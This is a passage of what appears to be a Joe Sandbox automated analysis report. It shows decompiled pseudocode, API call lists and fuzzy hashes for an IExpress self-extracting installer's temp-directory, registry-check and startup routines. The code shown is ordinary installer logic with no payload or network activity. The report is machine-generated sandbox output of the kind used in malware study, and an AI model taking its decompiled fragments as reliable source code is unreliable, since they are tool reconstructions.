                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t48 = 0xc91e4;
                                                                                                                                                                                                        				E000C1781(0xc91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                        				if(( *0xc9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E000C658A(_t48, 0x104, 0xc1140);
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				GetSystemInfo( &_v304);
                                                                                                                                                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					_push("i386");
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					E000C658A(_t48, 0x104);
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = _t26 - 1;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					_push("mips");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = _t28 - 1;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					_push("alpha");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t29 != 1) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push("ppc");
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}





















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C54C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C556F
                                                                                                                                                                                                          • Part of subcall function 000C53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C53FB
                                                                                                                                                                                                          • Part of subcall function 000C53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5402
                                                                                                                                                                                                          • Part of subcall function 000C53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C541F
                                                                                                                                                                                                          • Part of subcall function 000C53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C542B
                                                                                                                                                                                                          • Part of subcall function 000C53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-772166365
                                                                                                                                                                                                        • Opcode ID: a642dae81f989c827f84783b12b6d2644fef40405b32504594b6732cc220511c
                                                                                                                                                                                                        • Instruction ID: ce0c6e54a009c58127e9a14f26d14abcb8a19c06ff55725d6bbeee9b30f49dcf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a642dae81f989c827f84783b12b6d2644fef40405b32504594b6732cc220511c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50314974B00E045BEB209B659C59FBE73DAAB86346B14012EA901D21D2DB78EF818795
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 563 c256d-c257d 564 c2622-c2627 call c24e0 563->564 565 c2583-c2589 563->565 572 c2629-c262f 564->572 567 c25e8-c2607 RegOpenKeyExA 565->567 568 c258b 565->568 569 c2609-c2620 RegQueryInfoKeyA 567->569 570 c25e3-c25e6 567->570 568->572 573 c2591-c2595 568->573 574 c25d1-c25dd RegCloseKey 569->574 570->572 573->572 575 c259b-c25ba RegOpenKeyExA 573->575 574->570 575->570 576 c25bc-c25cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E000C256D(signed int __ecx) {
                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t31 = E000C24E0(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t13 - 1;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                        							if(_t24 == 0) {
                                                                                                                                                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                        								RegCloseKey(_v12); // executed
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t31 = _v8;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t31;
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,000C4096,000C4096,?,000C1ED3,00000001,00000000,?,?,000C4137,?), ref: 000C25B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,000C4096,?,000C1ED3,00000001,00000000,?,?,000C4137,?,000C4096), ref: 000C25CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,000C1ED3,00000001,00000000,?,?,000C4137,?,000C4096), ref: 000C25DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,000C4096,000C4096,?,000C1ED3,00000001,00000000,?,?,000C4137,?), ref: 000C25FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,000C4096,00000000,00000000,00000000,00000000,?,000C1ED3,00000001,00000000), ref: 000C261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 000C25A8
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 000C25C3
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 000C25F5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: 0ab2daed166f89eb01e6190e5de66f029dbe657ff97a1383263263b6f1411af8
                                                                                                                                                                                                        • Instruction ID: 0ff3d9c55e2d4ef23f7ae9e729aedbadef39a03dce0037cf10b8230474b844c9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ab2daed166f89eb01e6190e5de66f029dbe657ff97a1383263263b6f1411af8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE114235A42228FBAB20DB919C0DFFFBEBCEF057A5F214059B909A2111DA345E44D6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 577 c6a60-c6a91 call c7155 call c7208 GetStartupInfoW 583 c6a93-c6aa2 577->583 584 c6abc-c6abe 583->584 585 c6aa4-c6aa6 583->585 586 c6abf-c6ac5 584->586 587 c6aaf-c6aba Sleep 585->587 588 c6aa8-c6aad 585->588 589 c6ac7-c6acf _amsg_exit 586->589 590 c6ad1-c6ad7 586->590 587->583 588->586 591 c6b0b-c6b11 589->591 592 c6ad9-c6ae9 call c6c3f 590->592 593 c6b05 590->593 595 c6b2e-c6b30 591->595 596 c6b13-c6b24 _initterm 591->596 597 c6aee-c6af2 592->597 593->591 598 c6b3b-c6b42 595->598 599 c6b32-c6b39 595->599 596->595 597->591 600 c6af4-c6b00 597->600 601 c6b44-c6b51 call c7060 598->601 602 c6b67-c6b71 598->602 599->598 604 c6c39-c6c3e call c724d 600->604 601->602 610 c6b53-c6b65 601->610 603 c6b74-c6b79 602->603 607 c6b7b-c6b7d 603->607 608 c6bc5-c6bc8 603->608 614 c6b7f-c6b81 607->614 615 c6b94-c6b98 607->615 612 c6bca-c6bd3 608->612 613 c6bd6-c6be3 _ismbblead 608->613 610->602 612->613 616 c6be9-c6bed 613->616 617 c6be5-c6be6 613->617 614->608 618 c6b83-c6b85 614->618 619 c6b9a-c6b9e 615->619 620 c6ba0-c6ba2 615->620 616->603 622 c6c1e-c6c25 616->622 617->616 618->615 623 c6b87-c6b8a 618->623 624 c6ba3-c6bbc call c2bfb 619->624 620->624 626 c6c27-c6c2d _cexit 622->626 627 c6c32 622->627 623->615 625 c6b8c-c6b92 623->625 624->622 630 c6bbe-c6bbf exit 624->630 625->618 626->627 627->604 630->608
                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int* _t25;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed char _t41;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E000C7155();
                                                                                                                                                                                                        				_push(0x58);
                                                                                                                                                                                                        				_push(0xc72b8);
                                                                                                                                                                                                        				E000C7208(__ebx, __edi, __esi);
                                                                                                                                                                                                        				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                        					if(0 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(0 != _t56) {
                                                                                                                                                                                                        						Sleep(0x3e8);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t58 = 1;
                                                                                                                                                                                                        						_t53 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_t67 =  *0xc88b0 - _t58; // 0x2
                                                                                                                                                                                                        					if(_t67 != 0) {
                                                                                                                                                                                                        						__eflags =  *0xc88b0; // 0x2
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							 *0xc81e4 = _t58;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xc88b0 = _t58;
                                                                                                                                                                                                        							_t37 = E000C6C3F(0xc10b8, 0xc10c4); // executed
                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        								_t30 = 0xff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0x1f);
                                                                                                                                                                                                        						L000C6FF4();
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t68 =  *0xc88b0 - _t58; // 0x2
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_push(0xc10b4);
                                                                                                                                                                                                        							_push(0xc10ac);
                                                                                                                                                                                                        							L000C7202();
                                                                                                                                                                                                        							 *0xc88b0 = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                        							 *0xc88ac = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t71 =  *0xc88b4;
                                                                                                                                                                                                        						if( *0xc88b4 != 0 && E000C7060(_t71, 0xc88b4) != 0) {
                                                                                                                                                                                                        							_t60 =  *0xc88b4; // 0x0
                                                                                                                                                                                                        							 *0xca288(0, 2, 0);
                                                                                                                                                                                                        							 *_t60();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                        						_t59 =  *_t25;
                                                                                                                                                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t41 =  *_t59;
                                                                                                                                                                                                        							if(_t41 > 0x20) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t41 != 0) {
                                                                                                                                                                                                        								if(_t54 != 0) {
                                                                                                                                                                                                        									goto L32;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                        										_t59 = _t59 + 1;
                                                                                                                                                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        										_t41 =  *_t59;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t29 = 0xa;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(_t29);
                                                                                                                                                                                                        							_t30 = E000C2BFB(0xc0000, 0, _t59); // executed
                                                                                                                                                                                                        							 *0xc81e0 = _t30;
                                                                                                                                                                                                        							__eflags =  *0xc81f8;
                                                                                                                                                                                                        							if( *0xc81f8 == 0) {
                                                                                                                                                                                                        								exit(_t30); // executed
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *0xc81e4;
                                                                                                                                                                                                        							if( *0xc81e4 == 0) {
                                                                                                                                                                                                        								__imp___cexit();
                                                                                                                                                                                                        								_t30 =  *0xc81e0; // 0x80070002
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							__eflags = _t41 - 0x22;
                                                                                                                                                                                                        							if(_t41 == 0x22) {
                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                        								_t15 = _t54 == 0;
                                                                                                                                                                                                        								__eflags = _t15;
                                                                                                                                                                                                        								_t54 = 0 | _t15;
                                                                                                                                                                                                        								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                        							__imp___ismbblead(_t26);
                                                                                                                                                                                                        							__eflags = _t26;
                                                                                                                                                                                                        							if(_t26 != 0) {
                                                                                                                                                                                                        								_t59 = _t59 + 1;
                                                                                                                                                                                                        								__eflags = _t59;
                                                                                                                                                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t59 = _t59 + 1;
                                                                                                                                                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					return E000C724D(_t30);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t58 = 1;
                                                                                                                                                                                                        				__eflags = 1;
                                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000C7182
                                                                                                                                                                                                          • Part of subcall function 000C7155: GetCurrentProcessId.KERNEL32 ref: 000C7191
                                                                                                                                                                                                          • Part of subcall function 000C7155: GetCurrentThreadId.KERNEL32 ref: 000C719A
                                                                                                                                                                                                          • Part of subcall function 000C7155: GetTickCount.KERNEL32 ref: 000C71A3
                                                                                                                                                                                                          • Part of subcall function 000C7155: QueryPerformanceCounter.KERNEL32(?), ref: 000C71B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,000C72B8,00000058), ref: 000C6A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 000C6AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 000C6AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 000C6B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 000C6B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 000C6BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 000C6BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: 23e46a79e2f7b3e46b3b16a23f0997653c4581735c57637647b60390fb88c9c5
                                                                                                                                                                                                        • Instruction ID: 28461542bfaaf66d0d64f2b37188dfef5015198653df1e6a06022c90c744ce40
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23e46a79e2f7b3e46b3b16a23f0997653c4581735c57637647b60390fb88c9c5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F41E271A443249FEB719B68DC05FAE77E4EB45720F24802EE941E7291CF7A4C81CB95
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 631 c58c8-c58d5 632 c58d8-c58dd 631->632 632->632 633 c58df-c58f1 LocalAlloc 632->633 634 c5919-c5959 call c1680 call c658a CreateFileA LocalFree 633->634 635 c58f3-c5901 call c44b9 633->635 638 c5906-c5910 call c6285 634->638 644 c595b-c596c CloseHandle GetFileAttributesA 634->644 635->638 645 c5912-c5918 638->645 644->638 646 c596e-c5970 644->646 646->638 647 c5972-c597b 646->647 647->645
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E000C58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed char _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				CHAR* _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                                        				_t23 = __ecx + 1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t6 =  *_t27;
                                                                                                                                                                                                        					_t27 = _t27 + 1;
                                                                                                                                                                                                        				} while (_t6 != 0);
                                                                                                                                                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                                        					E000C1680(_t20, _t36, _t33);
                                                                                                                                                                                                        					E000C658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                        					_v8 = _t10;
                                                                                                                                                                                                        					LocalFree(_t20);
                                                                                                                                                                                                        					_t12 = _v8;
                                                                                                                                                                                                        					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						CloseHandle(_t12);
                                                                                                                                                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xc9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E000C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					 *0xc9124 = E000C6285();
                                                                                                                                                                                                        					_t14 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,000C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C58E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,000C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,000C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,000C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,000C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-3033780695
                                                                                                                                                                                                        • Opcode ID: 4cbfd7621bd0ba92c0c3fa1fcf7a0b3c30e388d4382cfba01401da0cd764c79b
